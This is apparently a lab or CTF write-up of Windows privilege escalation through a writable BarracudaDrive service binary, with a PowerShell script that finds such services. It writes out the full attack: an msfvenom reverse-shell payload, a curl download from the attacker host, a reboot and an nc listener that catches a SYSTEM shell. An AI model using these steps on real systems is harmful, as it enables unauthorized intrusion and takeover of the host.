Priv Esc
Last updated
Querying the bd (BarracudaDrive) service shows that it starts automatically at boot and runs as LocalSystem from C:\bd\bd.exe. The executable can be renamed in place from the low-privileged shell (see the move below), so C:\bd is writable by the current user, and whatever replaces bd.exe runs as SYSTEM the next time the service starts.
PS C:\xampp\htdocs> sc.exe qc bd
sc.exe qc bd
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\bd\bd.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BarracudaDrive ( bd ) service
DEPENDENCIES : Tcpip
SERVICE_START_NAME : LocalSystem
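The sc.exe query above checks one service by hand. The following PowerShell script is an added example, not part of the original notes, that generalizes the check: it walks every Win32 service, extracts the executable from the binary path, and reports those whose executable or containing directory grants the current user write access (the condition that made C:\bd\bd.exe swappable). The function names are the example's own; the ACL check looks only at Allow ACEs and ignores Deny ACEs and inherited-deny edge cases, so treat a hit as a lead to confirm, not proof.

```powershell
# Added example (not from the original notes): find services whose binary or
# binary directory is writable by the current user, i.e. candidates for the
# same binary-replacement privilege escalation used against bd.exe.

function Get-CurrentUserSids {
    # SIDs the current token carries: the user plus every group membership.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value)
    $sids += $id.Groups | ForEach-Object { $_.Value }
    return $sids
}

function Get-ServiceExecutable {
    # Reduce a service PathName ("C:\x\y.exe" -arg, or unquoted) to the executable.
    param([string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    # Unquoted path: take everything up to the first token ending in .exe.
    $m = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split '\s+')[0]
}

function Test-PathWritableByCurrentUser {
    # True if any Allow ACE on $Path grants Write/Modify/FullControl to one of $Sids.
    # Simplification: Deny ACEs are not evaluated.
    param([string]$Path, [string[]]$Sids)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if (([int]$rule.FileSystemRights -band [int]$writeMask) -eq 0) { continue }
        try {
            $sid = $rule.IdentityReference.Translate(
                [System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # unresolvable identity: skip the ACE
        if ($Sids -contains $sid) { return $true }
    }
    return $false
}

function Get-WritableServiceBinaries {
    $sids = Get-CurrentUserSids
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        $exe = [System.Environment]::ExpandEnvironmentVariables(
            (Get-ServiceExecutable -PathName $_.PathName))
        $dir = Split-Path -Path $exe -Parent
        $fileWritable = Test-PathWritableByCurrentUser -Path $exe -Sids $sids
        $dirWritable  = [bool]($dir -and (Test-PathWritableByCurrentUser -Path $dir -Sids $sids))
        if ($fileWritable -or $dirWritable) {
            [pscustomobject]@{
                Name         = $_.Name
                StartName    = $_.StartName   # LocalSystem => SYSTEM on restart
                StartMode    = $_.StartMode   # Auto => a reboot relaunches it
                State        = $_.State
                Executable   = $exe
                FileWritable = $fileWritable
                DirWritable  = $dirWritable
            }
        }
    }
}

Get-WritableServiceBinaries | Format-Table -AutoSize
```

Run it from the low-privileged shell; a row with StartName LocalSystem and StartMode Auto is the bd.exe situation. A writable directory with a non-writable file still counts, because renaming the original and dropping a new file (as done below with move and curl) only needs write access to the directory.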
❯ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.239 LPORT=8000 -f exe -o pwned.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: pwned.exe
PS C:\bd> move bd.exe bd1.exe
PS C:\bd> curl 192.168.45.239/pwned.exe -o bd.exe
PS C:\bd> shutdown /r /t 0
Renaming the original to bd1.exe instead of overwriting it keeps a copy for restoring the service afterwards. The reboot relies on START_TYPE being AUTO_START: the service is relaunched at boot and executes the swapped binary as LocalSystem. When the account has start/stop rights on the service (check the service DACL with sc.exe sdshow bd), sc.exe stop bd followed by sc.exe start bd achieves the same without rebooting the host; a full reboot is the noisy fallback.
❯ nc -lnvp 8000
listening on [any] 8000 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 49669
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nt authority\system
f2c6612b432ee1661a9c6b47b6500c8f
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.160.127
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.160.254